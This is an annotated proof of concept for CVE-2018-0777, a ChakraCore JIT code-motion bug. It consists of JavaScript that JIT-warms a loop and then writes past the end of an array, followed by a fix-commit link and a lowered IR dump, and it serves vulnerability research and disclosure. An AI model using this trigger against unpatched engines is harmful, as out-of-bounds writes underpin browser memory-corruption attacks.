
CVE-2018-0777 Code Motion

CVE-2018-0777 Code Motion PoC

// Proof-of-concept from the post for CVE-2018-0777 (ChakraCore JIT).
// The upstream fix is the commit linked after main() below; the post's IR
// dump that follows the code shows the BoundCheck and the
// BailOutOnArrayAccessHelperCall bailout the JIT attaches to the arr[i] store.
//
// opt(arr, start, end): stores one constant double into arr[i] for every i in
// [start, end). The loop shape is the whole point of the PoC — reformatting
// the control flow would change what the JIT sees, so it is left as written.
function opt(arr, start, end) {
  for (let i = start; i < end; i++) {
    if (i === 10) {
      // <<-- (a)  A no-op in JS semantics (i stays 10). The post marks this
      // as the statement involved in the "code motion" issue of the title;
      // see the linked commit for what the optimizer actually got wrong.
      i += 0;
    }
    // 2.3023e-320 is a denormal double. With end > arr.length this store is
    // out of range: under plain JS semantics that only grows the array, which
    // is the behaviour a correct (patched) engine should show.
    // NOTE(review): the post's IR suggests the bug is that the bound check
    // guarding this store is not kept where it is needed — confirm against
    // the linked fix rather than this comment.
    arr[i] = 2.3023e-320;
  }
}

// main(): the 1000 short calls presumably exist to get opt() JIT-compiled
// (warm-up; exact threshold not shown here — TODO confirm). The final call
// then runs the loop with end far past the 100-element array.
function main() {
  let arr = new Array(100);
  arr.fill(1.1);
  for (let i = 0; i < 1000; i++) opt(arr, 0, 3);
  opt(arr, 0, 100000);
}
main();
//https://github.com/Microsoft/ChakraCore/commit/14c752b66f43ee6ecc8dd2f7f9d5378f6a91638e

// The post's next line (Chinese) reads: "This is part of the IR after lowering:".
// The dump is kept on one line because its original line breaks are not recoverable.
IR 这是 lower 之后的部分 IR: Line 6: arr[i] = 2.3023e-320; Col 9: ^ StatementBoundary #4 #001d GLOBOPT INSTR: BoundCheck 0 <= s18(s9).i32 #001d Bailout: #001d (BailOutOnArrayAccessHelperCall) TEST s18(s9).i32, s18(s9).i32 # JNSB $L18 # $L19: [helper] ...